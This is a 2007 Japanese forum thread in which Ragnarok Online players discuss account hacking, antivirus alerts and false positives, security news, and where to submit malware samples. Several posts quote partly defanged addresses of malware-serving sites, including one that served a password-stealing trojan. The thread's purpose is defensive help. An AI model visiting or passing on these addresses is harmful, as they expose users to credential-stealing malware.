ID削除しただけではキャラは消えないんじゃなかったかな
だからキャラ消してからIDも削除っていうことになるんだろうか…
アイテムが取られたってのもその状態じゃ確認できないからね
ウイルスも見つかってないようだしこれまでとはなんか違うかも
癌IDのパスや普段使ってるメールアドレスも盗まれたんだろうか <>
(○口○*)さん<>sage<>07/09/19 21:35 ID:rH8Yf3+50<> >>157-158に対処した、Firefox2.0.0.7 出ました
QuickTime側の対処は調べてないので不明 <>
(○口○*)さん<>sage<>07/09/19 21:36 ID:rH8Yf3+50<> >>169
恐らく知り合いの犯行だな <>
(○口○*)さん<>sage<>07/09/19 21:45 ID:ijKeM+kK0<> 身内の犯行だろうと即思ったけど
誰もログイン可能な人はいないらしいんだ。
とりあえず継続して癌に対応してもらうようには本人に言ってはおいたけど。
メールアドレスは本人以外は使わないものだったみたい。
もちろんメッセと同じアドレスなんて事もなし。
PCを見るのはそのギルメンのみで家族にも触らせない…らしい。 <>
(○口○*)さん<>sage<>07/09/19 21:47 ID:YZLTCSiV0<> 新種のウイルスで既存のものでは検知できずに感染して情報盗まれたか
癌側のトラブルで消えてしまったなんてのもあるかもしれない
あと言い方悪いかもしれないけど自演で辞めたい理由を作ったかとか… <>
(○口○*)さん<>sage<>07/09/19 21:54 ID:QLlFWrGM0<> 原因としては
・垢ハックウイルス
・家族がいじった
・ROの知り合いにID教えてた
・ネカフェで使ったときにIDとパス残していった
あと、ホスト側でバックアップ取ってるのは当たり前だと思うから
粘ればデータ復帰できるかもしれない
・・・癌ならわからんが <>
(○口○*)さん<>sage<>07/09/19 22:01 ID:ijKeM+kK0<> とてもじゃないけど、今やめたい理由を作るような奴じゃなくて
その点については一切疑いはないんだ。
魔王関係の未実装情報ですごく盛り上がってたばかりだし。
ガンホー側のトラブルと何者かによるハックを疑ってるんだけど
先人達と同じように接続情報等については
一切出さないと言われたみたい。
>>174
ウィルスは既知の物じゃない可能性があるんで
また後日再スキャンするようには言ってみるつもり。
家族は絶対にない、と言ってますね。
ガンホーID共有もなし。
ネカフェで接続は3年前にあるけどアトラクションセンターへは入ってないみたいだから
それが原因でガンホーIDを消される事は考えにくいかも。 <>
(○口○*)さん<>sage<>07/09/19 22:03 ID:YZLTCSiV0<> 変なこと言ってごめんね
とりあえずそのPCはネットワークから外して
安全と思えるPCから全てのパスワードを変更した方が良いと思う <>
(○口○*)さん<>sage<>07/09/19 22:05 ID:ijKeM+kK0<> 全てというのはROに限らず、ですか?
ROに関係するのは…上の通り電子の藻屑みたいなので…。 <>
(○口○*)さん<>sage<>07/09/19 22:05 ID:QLlFWrGM0<> >>174
>>ガンホーIDそのものの削除。 <>
(○口○*)さん<>sage<>07/09/19 22:13 ID:YZLTCSiV0<> パス抜きもメッセやらそこら辺のも一緒に取られててもおかしくないし
今回はキャラ削除に必要なメアドも盗られてるともとれるから
でもあれこれ取られてるならそれなりの数のウイルスが混ざってそうなんだけどね
それが何一つ発見できないって言うのもおかしな点かなと… <>
(○口○*)さん<>sage<>07/09/19 22:17 ID:jJAzg6um0<> >>167
悪いこと云わんから、警察いけ。
さすがの癌呆でも1個人や民間人相手にLogの開示とかする訳無いから、早い時期に立件してもらって証拠保全しとくのが吉だぞ。
警察行くのマンドクセとか言うのなら、失った物の価値はその程度だったと言うことだ。 <>
(○口○*)さん<>sage<>07/09/19 22:47 ID:6dfexROJ0<> 流れを断ち切って申し訳ありませんが
【 気付いた日時 】2007年9月19日 20時半頃
【不審なアドレスのクリックの有無 】無いと思います(2〜3日Webブラウザを立ち上げていませんでした)
【 アドレス 】無いと思います
【 OS 】Microsoft Windows XP HomeEdition Version 2002 Service Pack 2
【使用ブラウザ 】Firefox バージョン2.0.0.7
【WindowsUpdateの有無】先週水曜?の定期アップデートが最後です
【 アンチウイルスソフト 】カスペルスキー インターネットセキュリティ6.0.2.614
【その他のSecurty対策 】PG2 Hosts書き換え Bit Defenderコマンドライン版 Ad-Aware Spybot
【 ウイルススキャン結果】感染しています: トロイ Trojan.Win32.Agent.bnx c:\program files\uninstall_cds.exe
【テンプレの参考サイトを読んだか】Yes
【hosts変更】有(ROアカウントハック対策スレのまとめサイト+アカウントハック総合対策スレ8の388-389
リネージュ資料室)
【PeerGuardian2導入】有(ROアカウントハック対策スレのまとめサイト リネージュ資料室 のリストを使用しています)
【説明】
感染発覚までの経緯を箇条で書かせていただきます
・9月18日の21時頃にBit Defender・Ad-Aware・Spybot・カスペで完全スキャンを行い、何もなかったのでROのクライアントを立ち上げる
・nPro削除の表示がされたので、OKを押してクライアント起動
・放置露店等を行い、本日午前8時頃にROクライアントを立ち下げ、PCの電源を切る
・本日19時頃に帰宅し、Bit Defender・Ad-Aware・Spybot・カスペで完全スキャンを行ったところ、カスペで
トロイ Trojan.Win32.Agent.bnx
c:\program files\uninstall_cds.exe
を発見し、削除
ここまでで怪しいのが、昨日から話題のnProの削除程度なのですが、2台あるPCのうちの片方でしか感染していませんでした(両PCともに昨夜ROを起動して、nPro削除されています)
2〜3日Webブラウザも立ち上げておらず、怪しいアドレスをクリックした記憶もありません(一人暮らしなので、誰かがPCを立ち上げて〜ということも無いはずです)
行った事といえば、各種ウィルス対策ソフトのアップデート程度です
Viruslistでも Virus Encyclopedia Can't find virus record となっているので、何が何やらわからない状況に陥っていますorz
何か助言等ありましたら、よろしくお願いします <>
(○口○*)さん<>sage<>07/09/19 23:05 ID:QLlFWrGM0<> カスペは3日ほど前に誤検出おこったことあったからまたそれかなー・・・わからないけど
ファイルのサンプル隔離してある・・・なんてことないよね・・・
そもそもUninstall_CDS.exeってなにするやつだったっけ <>
(○口○*)さん<>sage<>07/09/20 03:10 ID:RQ+Gb5AE0<> なんというKaspersky Live
ttp://d.hatena.ne.jp/tessy/20070919/1190138679
最大90日試用版とか、強気の攻勢に出てきたな…… <>
181<>sage<>07/09/20 08:16 ID:Jxo8H0y/0<> ID変わってると思いますが>>181です
念のため、OS入れなおし用のバックアップを作成し終わり、
>カスペは3日ほど前に誤検出おこったことあったからまたそれかなー・・・わからないけど
とあったので、試しにカスペのバックアップファイルから c:\program files\uninstall_cds.exe を元の位置に戻し、
最新の定義ファイルに更新して完全スキャンしてみたところ、何も検知されなくなっていました…
先ほど、カスペに誤検知なのか?の問い合わせのメールを送ってきました
返事が来たらまた連絡させていただきます(夜になってしまうと思いますが)
ありがとうございました <>
(○口○*)さん<>sage<>07/09/20 14:26 ID:RQ+Gb5AE0<> CDSって、Cactus Data Shield、CCCD技術のうちCDS-200などにあてはまる物ではないかな。
だとすると、誤検知の対象となるのも頷けるんだけど。
それでも、Program Files直下にファイルを配置するインストーラーはいただけないと思う。 <>
(○口○*)さん<>sage<>07/09/20 16:24 ID:eo6/+Bq50<> vipろだのハッキングについて詳細知ってる人いる? <>
(○口○*)さん<>sage<>07/09/20 16:46 ID:+COGXye00<> なんかあったのん? <>
(○口○*)さん<>sage<>07/09/20 16:53 ID:RQ+Gb5AE0<> vipper.orgがハッキング中
http://news23.2ch.net/test/read.cgi/news/1190224566/
軽くまとめ
ttp://enyoblog.blog16.fc2.com/blog-entry-337.html
>犯人は名前から判断して、トルコのイスラム系のハッカーらしい。なんでも、トルコ語で vip=装飾的な per=紙 という意味で、
>.orgが土下座している人に見えるから、vipper.org が装飾的な紙に土下座している=偶像崇拝、 <>
(○口○*)さん<>sage<>07/09/20 17:01 ID:+COGXye00<> なるほどthx
にしても物騒やねぇ。 <>
(○口○*)さん<>sage<>07/09/20 17:08 ID:eo6/+Bq50<> >>188
d
スクリプトやウイルスが仕掛けられたって話も出てたけど
いかんせん情報が錯綜しすぎてて何が何だか… <>
(○口○*)<><>07/09/20 23:01 ID:e/n1WMJv0<> なにぶんPCの内容に関してど素人なので詳しく書けませんでした。
ですが書き込むことを強く勧められたのでカキコミ
空欄はわからなかったので書けませんでした。
とても中途半端でスミマセン
【 気付いた日時 】 2007/9/19
【不審なアドレスのクリックの有無 】 ブログのコメントに貼ってあったのをミスッテクリック
【 アドレス 】 http://www■dentellexg■com/wenuser
【 OS 】 Microsoft Windows XP Home Edition Version 2002 ?
【使用ブラウザ 】
【WindowsUpdateの有無】
【 アンチウイルスソフト 】 avast! Antivirus (これでいいのか・・・?)
【その他のSecurty対策 】
【 ウイルススキャン結果】 なにもでず
【テンプレの参考サイトを読んだか】 今から読んでます
【hosts変更】 たぶん無
【PeerGuardian2導入】たぶん無
【説明】
ブログに貼ってあったURLをミスッテくりっく。そのことを知り合いに聞くと明らかに危険なものだと聞かされ
進められたとうり別PCからパス等を変更。ついでに教えてもらったソフトでスキャンしてみるもののなにもでず。
今の所被害は無し。 <>
(○口○*)さん<>sage<>07/09/20 23:09 ID:vmD/kdfy0<> >>191
そのページのソース見たけど、垢ハックか、他のものかはわからないが、悪意のあるプログラムを
導入させる可能性が非常に高そうだ。
導入前にブロックできた形跡がないことから、本体入手前に切断したか、実際に発動させてしまったかは
わからない。
必要なデータのバックアップをとって、OSの入れなおし(もしくはPCメーカー添付のディスクからのリカバリ)を
お勧めする。(踏んでしまったPCでログイン等は一切行なわないように) <>
(○口○*)<><>07/09/20 23:31 ID:e/n1WMJv0<> 実はこれ携帯でもこのアドレス踏んでるんだけどPC以外にも
携帯とかにも影響でるんでしょうか?
素人な質問でスミマセン <>
(○口○*)さん<>sage<>07/09/20 23:39 ID:eo6/+Bq50<> >>191
リネ資の危険URL(ウイルス置き場)に該当あり
OS再インストールマジオヌヌメ
携帯はまず心配ない <>
(○口○*)さん<>sage<>07/09/20 23:40 ID:k+3m9ZHI0<> 間違いなく危険アドレスです、垢ハクスレ参照
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/235
WindowsUpdateしていれば防げる物でありますが、
テンプレ報告でいつしたとは明記されてないので感染している可能性も
kasperskyは対応してるとのことなので不安であればそちらでのスキャンもお勧めします
携帯のウイルスもあるとは思いますがそこら辺は対象外ではないかと <>
(○口○*)さん<>sage<>07/09/20 23:48 ID:MrVrLIHyO<> とりあえず体験版でいいからカスペルやノートンなどのアンチウイルスソフトいれろ
テンプレ読んでPGもな <>
(○口○*)さん<>sage<>07/09/21 18:45 ID:2KQXR1FE0<> 国産圧縮ツール「Lhaplus」に脆弱性
ttp://www.atmarkit.co.jp/news/200709/21/ipa.html
最新版のVer1.55は脆弱性に対応済みとの事なので、利用者は更新を。
ARJ形式なんて殆ど使わないので影響は薄い気もするけど。 <>
(○口○*)さん<>sage<>07/09/21 22:41 ID:OhmWyaMt0<> 今のところ利用した攻撃は無いようだけど注意が必要
『Firefox や Opera を利用している場合でも、強制的に IE を使ってアクセスさせる』
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2007/09.html#20070921_Media
Windows Media PlayerのXMLタグに脆弱性が発覚
ttp://www.computerworld.jp/news/sec/79609.html <>
(○口○*)さん<>sage<>07/09/22 18:01 ID:W5W9+icq0<> すみません、アカウントハックスレのほうの
www■xiaoriben■net/shabi/
- www■xinluoqu■com/shabi/svch■exe
を踏んでしまいました。
自分はKaspersky Internet Security 試用版で検索をかけましたが
感染ファイルはなしでした。
どうやらsvch■exeは「MS06-014」のWindowsUpdateが出来ていれば
影響は受けない、ということらしかったので事なきを得たのかもしれませんが
まだ不安が残ります。
そこで質問なのですが
1.このファイルを踏んだときのPCの挙動はどのようなものか
例えば踏んだ途端Dos窓が開いてインストが行われる等
2.感染したとした場合、レジストリにどのような値が追加されるのか
3.感染していた場合の駆除方法
上記のようにKaspersky Internet Security 試用版では感染発見できませんでした。
よって駆除しようにもできないので他に方法がないか
以上です。どなたかご教授をお願いいたします。 <>
(○口○*)さん<>sage<>07/09/22 18:03 ID:B4D6piJO0<> OSクリーンインストールでFA <>
(○口○*)さん<>sage<>07/09/22 18:24 ID:ujlkB4EG0<> >>199
厳しいことを言うようだが、自分で調べられる力がないなら
下手なこと考えずにOS入れ直せとしか言えない。 <>
(○口○*)さん<>sage<>07/09/22 19:52 ID:kYaPKBIc0<> >>199
ウィルス名から、どんな挙動をするのか検索し、説明を読む。
類似名の亜種の場合は、似たような挙動をするがファイル名等が異なっている場合がある。以上。
恐くて踏めないアドレス、ウィルスの解説スレではありませんので、あんまり優しい回答が付かないのは当然です。
その辺はご了承ください。
ttp://www■xinluoqu■com/shabi/svch■exe
Norton検出名:Infostealer(アカウントハック総合スレの478報告による)
Kaspersky検出名:Trojan-PSW.Win32.Maran.gen
NOD32検出名:Win32/PSW.Maran trojan
検出名のウィルスの説明
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2000-122016-0558-99
http://www.viruslist.com/en/viruses/encyclopedia?virusid=160153
類似名のウィルスの説明
http://www.mcafee.com/japan/security/virM2003.asp?v=Maran
http://www.mcafee.com/japan/security/virPQ.asp?v=PWS-Maran.dr
http://www.mcafee.com/japan/security/virPQ.asp?v=PWS-Maran.dll
http://www.sophos.co.jp/security/analyses/trojmaranav.html
http://www.shareedge.com/spywareguide/product_show.php?id=3455 <>
(○口○*)さん<>sage<>07/09/23 18:09 ID:KsucxXNJ0<> 変な物踏んだので相談させていただきたく失礼します。
【 気付いた日時 】 9/23 15時30分頃
【不審なアドレスのクリックの有無 】 無関係なサイトと思って下記をクリック
【 アドレス 】 http://hpt■jp/
【 OS 】 WindowsXP Pro SP2
【使用ブラウザ 】 Firefox バージョン2.0.0.7
【WindowsUpdateの有無】 最新
【 アンチウイルスソフト 】 カスペルスキーインターネットセキュリティ2007
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 検出なし
【テンプレの参考サイトを読んだか】 今から読みます
【hosts変更】無
【PeerGuardian2導入】無
【説明】
無料HPスペースを探していて踏んだら、何故か出てきたのは出会い系サイトのようなページ。
管理人の悪い冗談か何かか?と一瞬思ったものの、不審に思いリンク先内容をソースチェッカーに
かけて読んでみると、どうも中身まで無料スペースとは思えない状態。
このアドレスについて色々調べてみたら、9月7日で無料スペースはすでに閉鎖されていて
契約の切れたドメインが横取りされている模様。
アクセスのさせ方から不安になったのでソースチェッカーで中身を見るも、安全度100%で
特に何かをDLさせる記述は見当たらず。カスペのスキャン結果も検出なし。
これは単にたちの悪い出会い系サイトが、無理矢理アクセスを稼ぐために契約切れのドメインを
ぶんどってきただけのことで垢ハックとは関係ないと見ていいんですかね(;´Д`)
OWN閉鎖の時にも期限切れのドメインが危ないって話が出ていたけど、本当におちおち
ブラウザ立ち上げてフラフラするのもままならない。 <>
(○口○*)さん<>sage<>07/09/23 19:10 ID:jpUndCXA0<> >>203
>1 (○口○*)さん sage 07/08/09 20:51 ID:3x0WeA4e0
>■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
書かれてる通りの挙動なら、定期的にチェックかけとけ。PG2で送信ブロックしとけば保険になる。 <>
(○口○*)さん<>sage<>07/09/23 20:48 ID:7iMteVQM0<> 見れないじゃなくて踏んじゃったけどどーすっかねって話だからまた違う気が駿河 <>
203<>sage<>07/09/23 22:07 ID:KsucxXNJ0<> >>204
気が動転していたせいでわかりづらい文章になっていて、申し訳ないです。
ソースチェッカーにかけたリンク先というのは踏んだ上で
「18歳以上ですか? はい、いいえ」といった物があるということで
URLを貼ったページ自体は踏んでしまっています。
PG2についてのアドバイスありがとうございます、これを機に導入しようかと。
>>205
意図を汲んでくれてありがとうございます。
踏んだ時からログインはしっぱなしなので、ひとまず信頼できる知人に
高価アイテムやZenyを一度預けようかと思います。 <>
(○口○*)さん<>sage<>07/09/23 22:17 ID:jpUndCXA0<> >>203
一応見てみたけど、普通にアダルト系サイトぽい。
踏まないのが無難だとは思うが、垢ハック目的で既存サイトのドメインを取得した訳ではなさそうです。
取り敢えず無害のようです。
後で危険なものが置かれるかもしれませんし、見落としもあるかもしれないので、保証はしませんが。 <>
(○口○*)さん<>sage<>07/09/25 20:21 ID:SCJajcyk0<> 質問です、今現在AVSというウィルス対策ソフトを
使用中なのですがこのソフトの信頼性?といいますか
対応速度や検出率はどれくらい信頼できるんでしょうか?
最近また垢ハック露店が出始めてきたので
無料ソフトをこのまま使ってても平気か心配になりました <>
(○口○*)さん<>sage<>07/09/25 20:47 ID:HIR+Znzr0<> 無料のAVSは信用なりませんからソース○クストのウイルスセキュリティをお金を出して買いなさい!
…と言ったら信用しますか?そういう事柄はまず自分の足で探し回った方がソースも取れるし
良いんでないかなという駄レス。お金を出した方が安心できるというなら出した方がいいと思うよ。
お金の無駄とまで言われる上述のソフトとかもあるけどさ。
ただ、基本的にそういうのはやることやっていさえすれば大丈夫なものです。ソフトにお金を
かけるかけない以前に要所要所をおさえた対策をとることは極めて代時かと思いますよ。
BSWikiより
# Active Virus Shield (AOL, 米)
* AOLが配布するカスペルスキーエンジン採用の無料アンチウイルスソフト
* 検出力はエンジンのおかげで優れているが、規約に『個人情報を収集する』等あるので選択としては微妙感あり
* 英語のみ <>
(○口○*)さん<>sage<>07/09/25 20:56 ID:RxjD9zUk0<> >>209
今はカスペエンジン使ってないよ。
たしかマカフィーあたりに切り替わった。
カスペスレで黒歴史をwikiに作って激しくブーイングを浴びた私が当該スレから参考資料をコピペ↓
AV-Comparatives 2007/8 オンデマンドテスト結果(2007/9/1発表、検体数808,344)
http://www.av-comparatives.org/seiten/ergebnisse_2007_08.php
------------(以下、「ADVANCED+」97%以上)---------------
1. Trustport AV WS 99.64%(△0.28, 2↑) |○ --.--% | 58%(FP22,STD)
2 .Avira AntiVir PE 7 99.45%(△0.60, 3↑) |C 99.29% | 71%(FP18,STD)
3 G-DATA AVK 99.31%(▼0.14, 1↓) |@ 99.88% | 31%(FP5,ADV)
4. Symantec NAV 2007 98.80%(△1.97, 7↑↑) |H 96.75% | 24%(FP0),ADV
5. Kaspersky 7.0 98.46%(△0.57, 5→) |D 98.86% | 9%(FP1,STD)
6. AVG AM 7.5 97.75%(△1.38, 9↑↑) G 96.81% | 8%(FP14,無印)
7 ESET NOD32 2.7 97.60%(△0.89, 8↑) |L 94.26% | 68%(FP2,ADV+)
8. F-Secure2007 97.57%(▼0.34, 4↓) |E 97.93% | 31%(FP1,ADV)
9. eScan 97.53%(▼0.36, 5↓) |○ --.--% | 9%(FP1,STD)
10. BitDefender 10 Pro 97.51%(△1.40, 10→) |B 99.51% | 48%(FP12,STD)
----------------(以下、「ADVANCED」93%以上)-----------
11 avast! Pro 4.7 95.24%(△1.38, 12↓) |F 96.99% | 26%(FP4,ADV)
12 McAfee 2007 93.15%(△1.52, 15↑↑) |N 93.71% | 24%(FP3,ADV)
---------(以下、「STANDARD」、90%以上)-------------------
13. F-Prot 92.20%(▼1.07, 14↓↓) |○ 87.03% | 31%(FP26,STD)
14. Norman 90.93%(▼2.70, 13↓↓) |○ 86.05% | 28%(FP8,ADV)
15. MS LiveOneCare1.6 90.37%(△7.97 , 17↑↑) |I 96.42% | 18%(FP1,STD)
---(以下、「無印」、90%未満)-------------------------------
16. Fortinet 89.98%(▼4.01, 11↓) |M 94.20% | 71%(FP1000超,無印)
17. Dr.Web 89.87%(△0.60, 16↓↓) |O 92.48%| 30%(FP36,STD) <>
(○口○*)さん<>sage<>07/09/25 21:21 ID:ilC/6CTD0<> >>210
AVSの配布と新規キーの発行は終了しましたが、AVS自体は KAV6.0の
機能制限版ですから、現在使用しているキーの有効期限が切れるまでは
Kasperskyエンジンで使い続けられます。
# 期限が来ても更新はできませんから、別製品を探さなくてはいけません。
現在配布されているのは McAfee VirusScan Plus のAOL版で、AVSではない
完全な別製品になります。 <>
(○口○*)さん<>sage<>07/09/26 01:57 ID:TIHTijtA0<> RMCの証拠アプロダに張ってあるSS見てウイルス感染とかってありえるんでしょうか?
装備証拠SSって書いてあって投稿主がLisaのAXってなってたんですが
SSはアテナとなってたからaguseとソースチェッカーオンライン通してみてみたんですが・・・。
http://www16■big■or■jp/~rmc2/cgi-bin/upb/file/screenAthena000■jpg
jpg開いて感染ってケースを聞いた事ないからもしもありえるようでしたら
テンプレに沿って書き直そうと思います。 <>
(○口○*)さん<>sage<>07/09/26 02:51 ID:n0LNzX3q0<> Proglam Filesフォルダを漁っていたら「RagSVB6XTest.exe」というものが見つかりました
作成した会社名が「Company」とえらく適当なうえに、ファイル名の頭の「Rag」のせいで、垢ハックプログラムか何かかと不安になるのですが…
作成年月日が2005/11/30とちょうど私がROを始めたころなのですが、正規クライアントの一部でしょうか…
「RagSVB6XTest.exe」でググってみましたが、何も見つかりませんでした <>
(○口○*)さん<>sage<>07/09/26 10:24 ID:YUxA5pli0<> >>213
"RagSVB6X"で検索すると、天使の休息シミュレータとやらが出てきたのだが、このあたりをダウンロードした覚えは無いかな。 <>
213<>sage<>07/09/26 10:30 ID:tG6umY+p0<> 「天使の休息シミュレータ」でググってみました
なるほど、数ヶ月前にちょこっとだけ使ってたような…
>>214
ありがとうございました <>
(○口○*)さん<>sage<>07/09/26 15:30 ID:S+NLcTmS0<> >>212
該当SSはRMCの規約に抵触する物として削除されましたよ
> SSはアテナとなってたからaguseとソースチェッカーオンライン通してみてみたんですが・・・。
おそらく、エミュ鯖で撮影されたSSです(JROにはAthena鯖はないけど、エミュには
Athena鯖ってのが存在してるはず)
> jpg開いて感染ってケースを聞いた事ないからもしもありえるようでしたら
JPGの描画エンジンの穴を狙って作られたJPG偽装マルウェアの新種であれば、
偽装されたJPGファイルを開いただけでアンチウィルスをくぐり抜けて感染するって
言う可能性もなきにしもあらず...過去に画像ファイル内にマルウェアが仕込まれた
例があったような気がしますが...記憶違いかな(汗) <>
216<>sage<>07/09/26 15:35 ID:S+NLcTmS0<> っと、一点補足
> 言う可能性もなきにしもあらず...過去に画像ファイル内にマルウェアが仕込まれた
> 例があったような気がしますが...記憶違いかな(汗)
これはROの垢ハックにおいて過去に例があったというのではなく、ウィルス全体の歴史
において過去に例があった気がするってことですので(だから、垢ハックやトロイという
表現ではなく「マルウェア」と記述した) <>
212<>sage<>07/09/26 17:04 ID:TIHTijtA0<> 216様情報ありがとうございます
当方でも削除確認いたしました。
たぶん大丈夫ですかねぇ・・・
RMC自治板で該当記事の削除要請も出たようなので
そこで情報を求めてみようかと思います。 <>
(○口○*)さん<>sage<>07/09/30 05:40 ID:yjhgbefe0<> しかしノートン、マカフィー、バスターの3大アンチウィルスはホント役に立たんな
垢ハック大抵素通りだし。 <>
(○口○*)さん<>sage<>07/09/30 14:16 ID:ZwHun+390<> テンプレの検体提出先に追加しなくっちゃ。¢(..)m...めもめも
ClamAV
http://www.clamav.org/sendvirus/
http://cgi.clamav.net/sendvirus.cgi
Fortinet
オンラインスキャナ 兼 検体提出
http://www.fortinet.co.jp/support/virus_scanner.html
ArcaBit(ArcaVir)
メールでも受け付けているようなので、メールでまとめて投げた方が楽かもしれない。
フォームとメールのどちらが対応早いかは不明。
http://www.arcabit.com/send.html
Rising Antivirus
添付ファイル付きでメールが送れそうなのでここから。
http://support.rising-global.com/index.php?_m=tickets&_a=submit <>
(○口○*)さん<>sage<>07/09/30 14:23 ID:wWPrasWS0<> >220
ttp://rosafe.rowiki.jp/
こっちも使った方がいいんじゃね? <>
(○口○*)さん<>sage<>07/09/30 19:44 ID:Dprc9N2A0<> サイバー犯罪者にとってネトゲ市場は美味しいようだ。
“利益追求型”サイバー犯罪者、次の狙いはオンラインゲーム
http://www.itmedia.co.jp/enterprise/articles/0709/28/news082.html <>
(○口○*)さん<>sage<>07/10/02 00:37 ID:1W4pAhKe0<> 雑談。
最近、垢ハックスレを見て思うのだが、
感染報告もあっちでやらなくてもいいんじゃないかな。
すっかりそれが楽しみになっちゃってる有志たちの
ウィルス対策情報に特化しちゃってもいいんじゃないか、という気が。
別に感染報告があっちにあってもいいんだけど、
言葉はアレだが「初心者」と「上級者」の混在が微妙感満載。 <>
(○口○*)さん<>sage<>07/10/02 01:11 ID:D0SW+xZk0<> 検体も提出してくれてるんだしいいじゃないかw <>
(○口○*)さん<>sage<>07/10/02 16:33 ID:GIGMkq+O0<> 楽しみじゃないぞ。
仲間が被害に遭わないようにというちょっと個人的な理由もあるが至って真面目だ。
感染報告はどっちでやてもいいかなーと言う感じはするね。 <>
(○口○*)さん<>sage<>07/10/02 16:34 ID:GIGMkq+O0<> 誤解を招きそうな文だった。どちらに相談に来てもいいよという意味。 <>
(○口○*)さん<>sage<>07/10/02 17:10 ID:fZqevErZ0<> ちょっと脱線するとすぐこっちに誘導されるし、
最初から相談はこっちでもいい気がする <>
(○口○*)さん<>sage<>07/10/02 18:25 ID:jXQcBK6m0<> まぎらわしいよりも、最初からこっちでいいかもね。
どうせ、案内する内容は、どの相談でも一緒だし、LiveROとRO板の区別でも、下記のようになってるし、
毎度毎度同じ案内文返すんだから、踏んだ時の相談はこっちでいいと思うな。
踏んだアドレスが新規だったりしたら、気付いた人がRO板に転記して、Wikiやまとめサイトの
hostsリストに反映して貰うって事で。
RO板
>流れの早いスレッドやツール関連の話、愚痴・職業叩きや煽り荒らし及び自由なスレッド作成がしたい人、
>一過性の話題でのスレッド作成はLiveRO板でお願いします。
LibeRO板
>スレ進行が早いもの、一発ネタスレ、(チートを除く)ROツールの話題などにご利用下さいです。 <>
(○口○*)さん<>sage<>07/10/03 00:05 ID:Wcfe4FQY0<> カスペのオンラインスキャナが文字化けして使えないのって自分だけ?
Win2kSP4
ロールアップ1(多分)
IE6.02.800.1106
SP1 <>
(○口○*)さん<>sage<>07/10/03 00:10 ID:EyCzfZnP0<> Win2kマシンだとなぜか IEがエラー落ちしてしまうな
XPでは、見た目も正常 <>
(○口○*)さん<>sage<>07/10/03 00:18 ID:EyCzfZnP0<> 時間ズレ直したら正常になった
Win2kでも文字化けはしないな <>
(○口○*)さん<>sage<>07/10/03 00:18 ID:Wcfe4FQY0<> 2000環境だと不具合があるっぽいのかな。
動作環境がIE5以上としか書いていないようだけど。。。
DSP版販売延長されたしXP買いにいって来るわ <>
(○口○*)さん<>sage<>07/10/03 00:27 ID:Wcfe4FQY0<> 自己解決できました。アドレスバーに直接下記URLを入力し、遷移したところ正常に動き出しました。
ttp://www.kaspersky.com/kos/jpj/partner/default/kavwebscan.html <>
(○口○*)さん<>sage<>07/10/04 15:55 ID:vc0j7CHb0<> >.223-228
使い分けを整理してみる(総合スレに投稿した内容のコピペ)
・新規ドメインの登録情報、hostsの更新リスト −総合対策スレ
・新規検体の報告と提出(対応)報告 −総合対策スレ
・セキュリティ関係のニュース、雑談 −セキュスレ
・踏んだ場合の相談 −現状、総合対策スレ(コメント内容は下記とほぼ同一)
・垢ハックじゃない危険アドレスを踏んだ相談 −セキュスレ
・踏んだところが危険かもしれないと思ったので相談 −セキュスレ(但し、鑑定スレじゃないと返答して終了)
・踏んでないけど危険な気がするので相談 −セキュスレ(但し、鑑定スレじゃないと返答して終了)
・検体提出先の追加 −セキュスレ(追記) <>
(○口○*)さん<>sage<>07/10/04 15:59 ID:vc0j7CHb0<> Wikiに整理する気力ないので、メモだけコピペ
−−−−−−−−−−−−−−−−−−−−−
受付窓口(メール) 追加(重複あっても気にしない
−−−−−−−−−−−−−−−−−−−−−
ArcaBit(ArcaVir) <virus@arcabit.com>
Rising Antivirus <support@rising-global.com>
Authentium <virus@authentium.com>
Sybari Software(Antigen) <submit_virus@research.sybari.com>
Panda <techsupport.japan@pandasecurity.com>
Proland Software(Protector Plus) <virsample@pspl.com>
Aladdin(eSafe) <esafe@aladdin.co.jp>
Hacksoft(TheHacker) <virus@hacksoft.com.pe>
Prevx(Prevx1) <virus@prevxresearch.com>
−−−−−−−
Webからの投稿
−−−−−−−
ClamAV(zipのパスワードは、virus 固定)
http://www.clamav.org/sendvirus/
http://cgi.clamav.net/sendvirus.cgi
Ewido(AVG Anti-Spyware)
http://www.ewido.net/en/malware/ <>
(○口○*)さん<>sage<>07/10/05 00:41 ID:r+YWG9LX0<> >>234
整理乙。
総合スレで華麗にスルーされてるのはちょっぴり泣けたけど、
まぁ、あっちで議論するもんじゃないのでOK。
あっちに被害状況が投稿されるのは否定はしないとして、
オススメはこちら、という切り分けがいいと思う。
たぶん、焦ってる人は見ないし、あっちに書くだろうし、
OS再インストールしろっていわれるだけなんだがな。 <>
(○口○*)さん<><>07/10/05 19:16 ID:LlPZUQoz0<> お勧めのウイルス対策ソフトを教えてください <>
(○口○*)さん<>sage<>07/10/05 19:19 ID:Zy0wgQ2S0<> 垢ハクスレやセキュスレ的に言うならカスペかNOD32だが
そう言う質問が出るあたり、まとめサイトとかも見てないな?
テンプレに載ってる各種サイトは一通り目を通した方がいいぞ。 <>
(○口○*)さん<>sage<>07/10/05 19:35 ID:LlPZUQoz0<> >>238
テンプレ怖くて踏めないの <>
(○口○*)さん<>sage<>07/10/05 20:27 ID:G0dvkkUS0<> (笑) <>
(○口○*)さん<>sage<>07/10/05 20:28 ID:G0dvkkUS0<> やっべ、IDがGODだ。
それでいて末尾がKUSOとはこれいかに。 <>
(○口○*)さん<>sage<>07/10/05 21:18 ID:nQlNYPFN0<> 惜しい! 目からヴィィィィムが出て大回転するほど惜しい!
O(オー)ではなく0(ゼロ)とマジレス <>
(○口○*)さん<>sage<>07/10/05 22:24 ID:Q2oupS6T0<> >>237
FW機能が欲しければカスペ。いらなければNOD32。
NOD32の次期バージョン(FW付き)のESET Smart Securtyβは正直完成度的に微妙。 <>
(○口○*)さん<>sage<>07/10/06 04:28 ID:0Hruz8ZV0<> テンプレすら読まない奴に教えなくていいと思うよ <>
(○口○*)さん <>sage<>07/10/06 05:20 ID:st4rYpca0<> 板違いかもしれねえですが雑談質問用とあったのでこちらへ
実はちと「垢ハックをよそおってそれを利用している」らしき
人物がおりまして その真意を確かめさせてもらえないかと・・・
んで内容ですが
「垢ハックにあった次の日癌に報告して 2〜3日後には
癌からアイテム救済をしてもらえそうなメールがかえってきた」
と 本人いっているわけです 警察への通報は本人から確認できてないです
まとめサイトみるかぎり ありえないとしかおもえないんですが
情報があまり明確じゃないですがわかる人いたら突っ込み御願いしますorz <>
